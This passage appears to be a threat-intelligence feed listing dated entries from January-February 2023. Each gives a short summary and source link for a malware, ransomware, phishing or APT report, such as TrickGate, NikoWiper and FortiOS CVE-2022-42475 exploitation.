Researchers from Checkpoint have identified that a shellcode-based packer dubbed TrickGate has been operating without attracting notice for over six years, enabling threat actors to deploy a wide range of malware over the years, including TrickBot, Emotet, AZORult, Agent Tesla, FormBook, Cerber, Maze, and REvil.
Source: https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/
2023-02-01
NikoWiper_Malware_Targeting_Ukraine_Energy_Sector
LOW
+
Intel Source:
Welivesecurity
Intel Name:
NikoWiper_Malware_Targeting_Ukraine_Energy_Sector
Date of Scan:
2023-02-01
Impact:
LOW
Summary:
ESET researchers have analyzed the activities of selected APT groups and identified the Russia-affiliated Sandworm using another wiper malware strain dubbed NikoWiper as part of an attack that took place in October 2022 targeting an energy sector company in Ukraine.
Source: https://www.welivesecurity.com/wp-content/uploads/2023/01/eset_apt_activity_report_t32022.pdf
2023-01-31
ASEC_Weekly_Malware_samples_January_16_22nd_2023
LOW
+
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_samples_January_16_22nd_2023
Date of Scan:
2023-01-31
Impact:
LOW
Summary:
The ASEC analysis team keeps monitoring weekly malware collection samples, here for January 16-22nd, 2023. They shared their analyses of the phishing email distribution cases observed during this week and provided statistical information on each type.
Source: https://asec.ahnlab.com/en/46464/
2023-01-31
The_Magniber_ransomware_spotlight
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
The_Magniber_ransomware_spotlight
Date of Scan:
2023-01-31
Impact:
MEDIUM
Summary:
Magniber, originally discovered in 2017, returned in 2021. It targets some Asian countries, and TrendMicro found it exploiting new vulnerabilities for initial access, including CVE-2021-26411, CVE-2021-40444, and most notably the PrintNightmare vulnerability, CVE-2021-34527.
Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-magniber
2023-01-31
Hackers_From_BlueBravo_Deploying_GraphicalNeutrino_Malware
LOW
+
Intel Source:
Recorded Future
Intel Name:
Hackers_From_BlueBravo_Deploying_GraphicalNeutrino_Malware
Date of Scan:
2023-01-31
Impact:
LOW
Summary:
Recorded Future researchers have identified new malware used by the BlueBravo threat group, whose activity overlaps with the Russian APT tracked as APT29 and NOBELIUM, which Western governments and researchers have linked to the Russian Foreign Intelligence Service (SVR).
Source: https://www.recordedfuture.com/bluebravo-uses-ambassador-lure-deploy-graphicalneutrino-malware
2023-01-30
The_Deep_Examination_of_Venom_Spider
LOW
+
Intel Source:
Esentire
Intel Name:
The_Deep_Examination_of_Venom_Spider
Date of Scan:
2023-01-30
Impact:
LOW
Summary:
Esentire researchers have discovered the real-world identity of the threat actor behind Golden Chickens malware-as-a-service, who goes by the online persona badbullzvenom.
Source: https://www.esentire.com/web-native-pages/unmasking-venom-spider
2023-01-30
Gootkit_Malware_Updating_With_New_Components_and_Obfuscations
LOW
+
Intel Source:
Mandiant
Intel Name:
Gootkit_Malware_Updating_With_New_Components_and_Obfuscations
Date of Scan:
2023-01-30
Impact:
LOW
Summary:
Mandiant researchers have identified that the threat actors associated with the Gootkit malware have made notable changes to their toolset, adding new components and obfuscations to their infection chains.
Source: https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations
2023-01-30
Hackers_From_Sandworm_Group_Targeting_News_Agencies
LOW
+
Intel Source:
CERT-UA
Intel Name:
Hackers_From_Sandworm_Group_Targeting_News_Agencies
Date of Scan:
2023-01-30
Impact:
LOW
Summary:
Researchers from CERT-UA have identified five different data-wiping malware strains deployed on the network of Ukraine's national news agency (Ukrinform) on January 17th.
Source: https://cert.gov.ua/article/3718487
2023-01-30
Database_Injection_Attacks_Compromise_WordPress_Sites
LOW
+
Intel Source:
Sucuri
Intel Name:
Database_Injection_Attacks_Compromise_WordPress_Sites
Date of Scan:
2023-01-30
Impact:
LOW
Summary:
Sucuri researchers have identified a massive campaign that infects over 4,500 WordPress websites as part of a long-running operation. According to GoDaddy-owned Sucuri, the infections involve the injection of obfuscated JavaScript hosted on a malicious domain that's designed to redirect visitors to undesirable sites.
Source: https://blog.sucuri.net/2023/01/massive-campaign-uses-hacked-wordpress-sites-as-platform-for-black-hat-ad-network.html
2023-01-30
Realtek_SDK_Vulnerability_Attempting_to_Hack_IoT_Devices
LOW
+
Intel Source:
PaloAlto
Intel Name:
Realtek_SDK_Vulnerability_Attempting_to_Hack_IoT_Devices
Date of Scan:
2023-01-30
Impact:
LOW
Summary:
Researchers from PaloAlto have observed a spike in exploitation attempts weaponizing a critical remote code execution flaw in the Realtek Jungle SDK. The ongoing campaign is said to have recorded 134 million exploit attempts as of December 2022, with 97% of the attacks occurring in the past four months.
Source: https://unit42.paloaltonetworks.com/realtek-sdk-vulnerability/#post-126726-_f37quwequ6r
2023-01-30
Sandworm_APT_Targeting_Ukraine
LOW
+
Intel Source:
ESET
Intel Name:
Sandworm_APT_Targeting_Ukraine
Date of Scan:
2023-01-30
Impact:
LOW
Summary:
ESET researchers have discovered a new Golang-based wiper, dubbed SwiftSlicer, that is used in attacks aimed at Ukraine. They believe that the Russia-linked APT group Sandworm (aka BlackEnergy and TeleBots) is behind the wiper attacks.
Source: https://twitter.com/ESETresearch/status/1618960022150729728?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1618960022150729728%7Ctwgr%5E9a31baf0903025b52670da9078fb3da0c09ff285%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fsecurityaffairs.com%2F141473%2Fapt%2Fsandworm-targets-ukraine-swiftslicer.html
2023-01-28
ASEC_Weekly_Malware_samples_January_8_14th_2023
LOW
+
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_samples_January_8_14th_2023
Date of Scan:
2023-01-28
Impact:
LOW
Summary:
The ASEC analysis team keeps monitoring weekly malware collection samples, here for January 8-14th, 2023. They shared their analyses of the phishing email distribution cases observed during this week and provided statistical information on each type.
Source: https://asec.ahnlab.com/en/46276/
2023-01-27
The_Deep_Examination_of_GuLoader
LOW
+
Intel Source:
Trellix
Intel Name:
The_Deep_Examination_of_GuLoader
Date of Scan:
2023-01-27
Impact:
LOW
Summary:
Trellix researchers have analyzed the multiple archive types used by threat actors to trick users into opening an email attachment and the progression of its distribution inside NSIS (Nullsoft Scriptable Install System) executable files by showing the obfuscation and string encryption updates through the year 2022.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/guloader-the-nsis-vantage-point.html
2023-01-27
Chinese_PlugX_Malware_Hidden_in_USB_Devices
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Chinese_PlugX_Malware_Hidden_in_USB_Devices
Date of Scan:
2023-01-27
Impact:
MEDIUM
Summary:
Researchers from PaloAlto have discovered a similar variant of PlugX in VirusTotal that infects USB devices and copies all Adobe PDF and Microsoft Word files from the host. It places these copies in a hidden folder on the USB device that is created by the malware.
Source: https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/
2023-01-27
Cybercriminals_Leveraging_Legitimate_RMM_software
MEDIUM
+
Intel Source:
CISA
Intel Name:
Cybercriminals_Leveraging_Legitimate_RMM_software
Date of Scan:
2023-01-27
Impact:
MEDIUM
Summary:
CISA researchers have identified a widespread cyber campaign involving the malicious use of legitimate RMM software. Specifically, cyber-criminal actors send phishing emails that lead the target to download legitimate RMM software—ScreenConnect (now ConnectWise Control) and AnyDesk—which the actors then use in a refund scam to steal money from victim bank accounts.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa23-025a
2023-01-27
Kronos_Malware_Increasing_its_Functionality
LOW
+
Intel Source:
IBM Security Intelligence
Intel Name:
Kronos_Malware_Increasing_its_Functionality
Date of Scan:
2023-01-27
Impact:
LOW
Summary:
Researchers from IBM Security Intelligence have identified that Kronos Malware is back with new functionality. It is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims.
Source: https://securityintelligence.com/kronos-malware-reemerges-increased-functionality/?c=Threat%20Research
2023-01-27
Hackers_Targeting_Tech_Layoff_Employees_With_Job_Scams
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
Hackers_Targeting_Tech_Layoff_Employees_With_Job_Scams
Date of Scan:
2023-01-27
Impact:
MEDIUM
Summary:
Zscaler Threatlabz researchers have observed multiple suspicious job portals and surveys used by attackers to solicit information from job seekers under the guise of employment application forms. The attackers may advertise jobs online, sometimes setting up fake websites, or look for targets on social media to steal money and personal information.
Source: https://www.zscaler.com/blogs/security-research/job-scams-impersonate-companies-still-hiring-following-tech-layoffs
2023-01-27
Mimic_Ransomware_Targeting_Russian_and_English_Speaking_Users
LOW
+
Intel Source:
TrendMicro
Intel Name:
Mimic_Ransomware_Targeting_Russian_and_English_Speaking_Users
Date of Scan:
2023-01-27
Impact:
LOW
Summary:
Researchers from TrendMicro have discovered a new ransomware that abuses the APIs of a legitimate tool called Everything, a Windows filename search engine developed by Voidtools that offers quick searching and real-time updates for minimal resource usage.
Source: https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html
2023-01-27
Titan_Stealer_Leveraging_GoLang
LOW
+
Intel Source:
Cyble
Intel Name:
Titan_Stealer_Leveraging_GoLang
Date of Scan:
2023-01-27
Impact:
LOW
Summary:
Cyble researchers have observed that threat actors use Golang for their information stealer malware. Additionally, Titan Stealer has been spotted using multiple Command and Control (C&C) infrastructures to target new victims.
Source: https://blog.cyble.com/2023/01/25/titan-stealer-the-growing-use-of-golang-among-threat-actors/
2023-01-26
Hackers_Leveraging_ProxyNotShell_For_Attacks
LOW
+
Intel Source:
Bitdefender
Intel Name:
Hackers_Leveraging_ProxyNotShell_For_Attacks
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
BitDefender researchers have started observing an increase in attacks using ProxyNotShell/OWASSRF exploit chains to target on-premises Microsoft Exchange deployments.
Source: https://businessinsights.bitdefender.com/technical-advisory-proxyhell-exploit-chains-in-the-wild
2023-01-26
Critical_ManageEngine_Vulnerability_Observed
MEDIUM
+
Intel Source:
Rapid 7
Intel Name:
Critical_ManageEngine_Vulnerability_Observed
Date of Scan:
2023-01-26
Impact:
MEDIUM
Summary:
Rapid7 is taking precautionary steps in response to exploitation of CVE-2022-47966. Several of the affected products are extremely popular with organizations and attackers, including ADSelfService Plus and ServiceDesk Plus. Rapid7 provided a detailed analysis of CVE-2022-47966 in AttackerKB. Rapid7's vulnerability research team discovered during testing that some products may be more exploitable than others, namely ServiceDesk Plus and ADSelfService Plus.
Source: https://www.rapid7.com/blog/post/2023/01/19/etr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability/
2023-01-26
North_Korean_Hackers_Moving_With_Credential_Harvesting
LOW
+
Intel Source:
Proofpoint
Intel Name:
North_Korean_Hackers_Moving_With_Credential_Harvesting
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
Researchers from Proofpoint have attributed a new wave of malicious email attacks to a North Korean threat group well known for crypto heists, as part of a "sprawling" credential harvesting activity targeting a number of industry verticals, marking a significant shift in its strategy.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds
2023-01-26
Active_IOCs_of_APT_Group_Gamaredon
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_APT_Group_Gamaredon
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of APT Group Gamaredon. It is a Russia-backed advanced persistent threat (APT) that has been operating since at least 2013. The group is believed to be operating out of Ukraine, and is thought to be focused on targeting Ukrainian government and military organizations, as well as individuals and organizations in the energy sector.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt-group-gamaredon-active-iocs-31
2023-01-26
Cybercriminals_Using_JQuery_to_Spread_Malware
LOW
+
Intel Source:
SocInvestigation
Intel Name:
Cybercriminals_Using_JQuery_to_Spread_Malware
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
Researchers from SocInvestigation have identified that the popular JavaScript library jQuery is being used by hackers to distribute malware.
Source: https://www.socinvestigation.com/malicious-jquery-javascript-threat-detection-incident-response/
2023-01-26
The_ConnectWise_Control_vulnerabilities_and_exploitation
LOW
+
Intel Source:
Huntress
Intel Name:
The_ConnectWise_Control_vulnerabilities_and_exploitation
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
During December, the Huntress team followed the discussion surrounding supposed ConnectWise Control vulnerabilities and possible in-the-wild exploitation. The Huntress team has been in contact with both the ConnectWise CISO and security team, did their own research on the claims, and explained their opinion in detail.
Source: https://www.huntress.com/blog/clearing-the-air-overblown-claims-of-vulnerabilities-exploits-severity
2023-01-26
The_rised_concern_of_Amadey_Bot
LOW
+
Intel Source:
Cyble
Intel Name:
The_rised_concern_of_Amadey_Bot
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
Recently, Cyble Research and Intelligence Labs (CRIL) observed a huge spike in Amadey bot samples. This shows that threat actors are actively using this bot to infect victims’ systems with additional malware.
Source: https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/
2023-01-26
Hackers_From_DragonSpark_Using_Golang_Malware_to_Avoid_Detection
MEDIUM
+
Intel Source:
Sentinelone
Intel Name:
Hackers_From_DragonSpark_Using_Golang_Malware_to_Avoid_Detection
Date of Scan:
2023-01-26
Impact:
MEDIUM
Summary:
Researchers from SentinelOne have identified that companies in East Asia are being targeted by a Chinese-speaking threat actor named DragonSpark. The attacks are characterized by the use of the little-known open-source SparkRAT and malware that attempts to evade detection through Golang source code interpretation.
Source: https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/
2023-01-26
Active_IOCs_of_Ursnif_Banking_Trojan_aka_Gozi
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Ursnif_Banking_Trojan_aka_Gozi
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of the Ursnif banking trojan, also known as Gozi and Dreambot, which has been around for more than 10 years. It gained popularity in 2015 when its source code was published on GitHub, and since then its operators have continually tweaked it to suit their aims.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-aka-gozi-active-iocs-2
2023-01-26
Vice_Society_Ransomware_Group_Targeting_Manufacturing_Companies
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
Vice_Society_Ransomware_Group_Targeting_Manufacturing_Companies
Date of Scan:
2023-01-26
Impact:
MEDIUM
Summary:
TrendMicro researchers have highlighted the findings of Vice Society, which includes an end-to-end infection diagram.
Source: https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html
2023-01-26
Active_IOCs_of_Remcos_RAT
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Remcos_RAT
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Remcos RAT, which has been operating since 2016. This RAT was originally promoted as genuine software for remote control of Microsoft Windows from XP onwards, and is frequently found in phishing attempts due to its capacity to completely infect an afflicted machine.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-remcos-rat-active-iocs-86
2023-01-26
New_Evasion_Methods_For_Emotet
LOW
+
Intel Source:
Blackberry
Intel Name:
New_Evasion_Methods_For_Emotet
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
BlackBerry researchers have observed that Emotet has returned with new techniques. It continues to steadily evolve, adding new techniques for evasion and increasing its likelihood of successful infections. It is also able to host an array of modules, each used for different aspects of information theft, that report back to its command-and-control (C2) servers.
Source: https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion
2023-01-26
Active_IOCs_of_Raccoon_Infostealer
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Raccoon_Infostealer
Date of Scan:
2023-01-26
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Raccoon Infostealer. It gathers private data such as credit card numbers, cryptocurrency wallet addresses, login passwords, and browser information like cookies and history.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-raccoon-infostealer-active-iocs-39
2023-01-25
A_Deep_Examination_of_Raspberry_Robin
LOW
+
Intel Source:
Esentire
Intel Name:
A_Deep_Examination_of_Raspberry_Robin
Date of Scan:
2023-01-25
Impact:
LOW
Summary:
Esentire researchers have observed 11 cases of Raspberry Robin infections since May 2022 and analyzed them.
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raspberry-robin
2023-01-25
Titan_Stealer_Malware_Distributing_via_Telegram_Channel
LOW
+
Intel Source:
Uptycs
Intel Name:
Titan_Stealer_Malware_Distributing_via_Telegram_Channel
Date of Scan:
2023-01-25
Impact:
LOW
Summary:
Researchers from Uptycs have discovered a campaign involving the Titan Stealer malware, which is being marketed and sold by a threat actor (TA) through a Telegram channel for cybercrime purposes.
Source: https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign
2023-01-25
Black_Friday_Day_Makes_Big_For_Malvertising
LOW
+
Intel Source:
Confiant
Intel Name:
Black_Friday_Day_Makes_Big_For_Malvertising
Date of Scan:
2023-01-25
Impact:
LOW
Summary:
Confiant researchers have observed a cookie-stuffing campaign running across multiple programmatic ad platforms with a specific uptick in Q4 around Black Friday.
Source: https://blog.confiant.com/malvertiser-makes-the-big-bucks-on-black-friday-637922cd5865
2023-01-24
8220_Gang_Targeting_Vulnerable_Cloud_Providers
LOW
+
Intel Source:
Radware
Intel Name:
8220_Gang_Targeting_Vulnerable_Cloud_Providers
Date of Scan:
2023-01-24
Impact:
LOW
Summary:
Radware researchers have identified that the Chinese threat group known as 8220 Gang is targeting cloud providers and poorly secured applications with a custom-built crypto miner and IRC bot.
Source: https://www.radware.com/getattachment/7f0b519f-b292-49f4-9319-746218961cc6/Advisory-8220-Gang-Targeting-Cloud-Providers-012023.pdf.aspx
2023-01-24
Advertisement_Fraud_Scheme_VASTFLUX_Targeted_Over_11_Million_Devices
LOW
+
Intel Source:
Human Blog
Intel Name:
Advertisement_Fraud_Scheme_VASTFLUX_Targeted_Over_11_Million_Devices
Date of Scan:
2023-01-24
Impact:
LOW
Summary:
Researchers from HUMAN’s Satori Threat Intelligence team have identified a sophisticated ad fraud scheme, dubbed VASTFLUX, that targeted more than 11 million devices.
Source: https://www.humansecurity.com/learn/blog/traffic-signals-the-vastflux-takedown
2023-01-24
Remcos_RAT_Deployment_by_GuLoader
LOW
+
Intel Source:
Cyfirma
Intel Name:
Remcos_RAT_Deployment_by_GuLoader
Date of Scan:
2023-01-24
Impact:
LOW
Summary:
CYFIRMA researchers have identified the distribution of a malicious PDF file through email. It redirects the user to a cloud-based platform where they are prompted to download a ZIP file.
Source: https://www.cyfirma.com/outofband/guloader-deploying-remcos-rat/
2023-01-23
Diving_Deep_into_LockBit_Ransomware
MEDIUM
+
Intel Source:
Analyst1
Intel Name:
Diving_Deep_into_LockBit_Ransomware
Date of Scan:
2023-01-23
Impact:
MEDIUM
Summary:
Researchers from Analyst1 have analyzed the LockBit ransomware operations. It is one of the most notorious organized cybercrime syndicates that exists today.
Source: https://analyst1.com/ransomware-diaries-volume-1/
2023-01-20
Exploitation_of_FortiOS_Vulnerability_CVE_2022_42475
HIGH
+
Intel Source:
Mandiant
Intel Name:
Exploitation_of_FortiOS_Vulnerability_CVE_2022_42475
Date of Scan:
2023-01-20
Impact:
HIGH
Summary:
Mandiant is monitoring a suspected China-nexus campaign that exploited a recently discovered vulnerability in Fortinet's FortiOS SSL-VPN, CVE-2022-42475, as a zero-day. Mandiant discovered a new malware called “BOLDMOVE” during the investigation. They found a Windows variant of BOLDMOVE and a Linux variant, which is specifically designed to run on FortiGate Firewalls.
Source: https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw
2023-01-20
New_CrySIS_or_Dharma_Ransomware_Variants
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
New_CrySIS_or_Dharma_Ransomware_Variants
Date of Scan:
2023-01-20
Impact:
MEDIUM
Summary:
Fortinet Labs researchers have analyzed the variants of the CrySIS/Dharma ransomware family.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-playing-whack-a-mole-with-new-crysis-dharma-variants
2023-01-20
Fortinet_Firewall_Vulnerability_Exploited_by_New_Chinese_Malware
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
Fortinet_Firewall_Vulnerability_Exploited_by_New_Chinese_Malware
Date of Scan:
2023-01-20
Impact:
MEDIUM
Summary:
Researchers from Mandiant have identified a China-nexus threat actor who exploited a recently patched vulnerability in Fortinet FortiOS SSL-VPN as a zero-day in attacks targeting a European government entity and a managed service provider (MSP) located in Africa.
Source: https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw
2023-01-20
Database_Infections_That_Compromise_Vulnerable_WordPress_Sites
LOW
+
Intel Source:
Sucuri
Intel Name:
Database_Infections_That_Compromise_Vulnerable_WordPress_Sites
Date of Scan:
2023-01-20
Impact:
LOW
Summary:
Sucuri researchers have identified a database injection that has two different pieces of malware accomplishing two unrelated goals. The first injection redirects users to a spammy sports website and the second injection boosts authority of a spammy casino website within search engines.
Source: https://blog.sucuri.net/2023/01/vulnerable-wordpress-sites-compromised-with-different-database-infections.html?web_view=true
2023-01-20
The_Vidar_operators_expanding_their_infrastructure
MEDIUM
+
Intel Source:
Team Cymru
Intel Name:
The_Vidar_operators_expanding_their_infrastructure
Date of Scan:
2023-01-20
Impact:
MEDIUM
Summary:
Team Cymru researchers analyzed Vidar infrastructure, and the Vidar operators appear to be expanding it. Vidar is an info-stealer malware, first spotted in the wild in late 2018 by the security researcher Fumik0. The name itself (Vidar) is derived from a string found in the malware’s code. Vidar is considered to be a distinct fork of the Arkei malware family.
Source: https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure
2023-01-20
ASEC_Weekly_Malware_samples_January_9_15th_2023
LOW
+
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_samples_January_9_15th_2023
Date of Scan:
2023-01-20
Impact:
LOW
Summary:
The ASEC analysis team keeps monitoring weekly malware collection samples, here for January 9-15th, 2023. The top malware for this week was SmokeLoader, BeamWinHTTP, Formbook, AgentTesla and Lokibot.
Source: https://asec.ahnlab.com/en/46169/
2023-01-19
Batloader_Malware_Attacks_in_Q4_2022_Used_Obfuscated_JavaScript_Files_and_Legitimate_Tools
LOW
+
Intel Source:
TrendMicro
Intel Name:
Batloader_Malware_Attacks_in_Q4_2022_Used_Obfuscated_JavaScript_Files_and_Legitimate_Tools
Date of Scan:
2023-01-19
Impact:
LOW
Summary:
Researchers from TrendMicro have identified notable Batloader campaigns that they observed in the last quarter of 2022, including the abuse of custom action scripts from the Advanced Installer software and Windows Installer XML (WiX) toolset, the use of obfuscated JavaScript files as a first-stage payload, and the use of PyArmor tool to obfuscate Batloader Python scripts.
Source: https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html
2023-01-19
Active_IOCs_of_STRRAT_Malware
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_STRRAT_Malware
Date of Scan:
2023-01-19
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of STRRAT Malware. It is a Java-based Remote-Access Trojan (RAT) with a slew of malicious features, notably information theft and backdoor capabilities.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-strrat-malware-active-iocs-7
2023-01-19
The_SEO_Poisoning_attack
LOW
+
Intel Source:
SentinelOne
Intel Name:
The_SEO_Poisoning_attack
Date of Scan:
2023-01-19
Impact:
LOW
Summary:
Many researchers have observed an increase in malicious search engine advertisements in the wild, known as SEO poisoning, which is a form of malvertising (malicious advertising). There is increasing variety in the specifics of the malware delivery method, such as which searches produce the malicious advertisements and which malware is delivered.
Source: https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/
2023-01-19
Cybersecurity_incident_on_website_of_Liquor_Control_Board_of_Ontario
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Cybersecurity_incident_on_website_of_Liquor_Control_Board_of_Ontario
Date of Scan:
2023-01-19
Impact:
LOW
Summary:
This month, the Liquor Control Board of Ontario (LCBO) shared news about a cybersecurity incident affecting online sales. The incident was a web skimmer designed to capture customer payment information.
Source: https://www.malwarebytes.com/blog/news/2023/01/web-skimmer-found-on-website-of-liquor-control-board-of-ontario
2023-01-19
The_LNK_metadata_trail
LOW
+
Intel Source:
Talos
Intel Name:
The_LNK_metadata_trail
Date of Scan:
2023-01-19
Impact:
LOW
Summary:
Cisco Talos researchers analyzed metadata in LNK files that links to threat actors' tactics, techniques and procedures, in order to identify their activity. The report shares their analyses of Qakbot and Gamaredon as examples.
Source: https://blog.talosintelligence.com/following-the-lnk-metadata-trail/
2023-01-19
Active_IOCs_of_Gh0st_RAT
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Gh0st_RAT
Date of Scan:
2023-01-19
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Gh0st RAT. It is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information and data. This type of malware enables cybercriminals to gain complete access to infected computers and attempt to hijack the user’s banking account.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gh0st-rat-active-iocs-4
2023-01-18
Malicious_Google_Ads
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Malicious_Google_Ads
Date of Scan:
2023-01-18
Impact:
LOW
Summary:
Researchers from SANS have identified that Google ads are a common vector for malware distribution. These ads frequently lead to fake sites impersonating web pages for legitimate software.
Source: https://isc.sans.edu/diary/rss/29448
2023-01-18
Abusing_Google_Ads_platform_by_various_campaigns
LOW
+
Intel Source:
Cyfirma
Intel Name:
Abusing_Google_Ads_platform_by_various_campaigns
Date of Scan:
2023-01-18
Impact:
LOW
Summary:
CYFIRMA researchers observed the campaigns closely and provided a preliminary analysis of a new RAT known as “VagusRAT” and its possible attribution to Iranian threat actors. VagusRAT is also delivered to victims by abusing Google Ads.
Source: https://www.cyfirma.com/outofband/vagusrat-a-new-entrant-in-the-external-threat-landscape/
2023-01-18
Active_IOCs_of_NJRAT
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_NJRAT
Date of Scan:
2023-01-18
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of NJRAT. It is a Remote Access Trojan, which is found leveraging Pastebin to deliver a second-stage payload after initial infection.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-njrat-active-iocs-49
2023-01-18
Attacks_on_Iranian_Government_Entities_Through_Backdoor_Diplomacy
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Attacks_on_Iranian_Government_Entities_Through_Backdoor_Diplomacy
Date of Scan:
2023-01-18
Impact:
MEDIUM
Summary:
PaloAlto researchers have identified that the threat actor known as Backdoor Diplomacy has been linked to a new wave of attacks targeting Iranian government entities between July and late December 2022.
Source: https://unit42.paloaltonetworks.com/playful-taurus/
2023-01-17
The_observation_of_the_numerous_attacks_by_NetSupport_RAT_campaign
LOW
+
Intel Source:
SentinelOne
Intel Name:
The_observation_of_the_numerous_attacks_by_NetSupport_RAT_campaign
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
Researchers from ASEC reported on a NetSupport RAT campaign that uses Pokemon as the social engineering lure. Threat actors are hosting a Pokemon-based NFT game at malicious sites, offering both fun and financial rewards.
Source: https://www.sentinelone.com/blog/gotta-catch-em-all-understanding-the-netsupport-rat-campaigns-hiding-behind-pokemon-lures/
2023-01-17
ASEC_Weekly_Phishing_Email_Threats_analyses_January_1_7_2023
LOW
+
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Phishing_Email_Threats_analyses_January_1_7_2023
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
The ASEC analysis team keeps monitoring phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post explains the distribution of phishing email samples during the week from January 1st, 2023 to January 7th, 2023. The most prevalent threat type observed in phishing email attachments was FakePage, at 58%. FakePages are web pages where the threat actor has duplicated the screen layout, logo, and font of real login pages or advertising pages, leading users to enter their account and password information.
Source: https://asec.ahnlab.com/en/45693/
2023-01-17
Phishing_Email_Targeting_National_Tax_Service
LOW
Intel Source:
ASEC
Intel Name:
Phishing_Email_Targeting_National_Tax_Service
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
Researchers from ASEC have discovered that a phishing email impersonating the National Tax Service is being distributed.
Source: https://asec.ahnlab.com/en/45669/
2023-01-17
Active_IOCs_of_Bitter_APT_Group
LOW
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Bitter_APT_Group
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
The Rewterz analyst team published an analysis summary of the Bitter APT group. The group, also tracked as APT-17, has recently been active and is targeting sectors in South Asia for information theft and espionage. It has a history of targeting the energy, engineering, and government sectors in South Asia.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-bitter-apt-group-active-iocs-22
2023-01-17
Decryption_Tool_For_BianLian_Ransomware_Released_by_Avast
LOW
Intel Source:
Avast
Intel Name:
Decryption_Tool_For_BianLian_Ransomware_Released_by_Avast
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
Avast researchers have released a free decryptor for the BianLian ransomware strain to help victims of the malware recover locked files without paying the hackers.
Source: https://decoded.avast.io/threatresearch/decrypted-bianlian-ransomware/
2023-01-17
A_manuscript_Solicitation_Letter_was_disguised_by_malware
LOW
Intel Source:
ASEC
Intel Name:
A_manuscript_Solicitation_Letter_was_disguised_by_malware
Date of Scan:
2023-01-17
Impact:
LOW
Summary:
On January 8th, the ASEC analysis team discovered a document-type malware targeting workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro.
Source: https://asec.ahnlab.com/en/45658/
2023-01-17
Exploitation_by_attackers_to_deliver_malware_with_Microsoft_Office_macros
LOW
Intel Source:
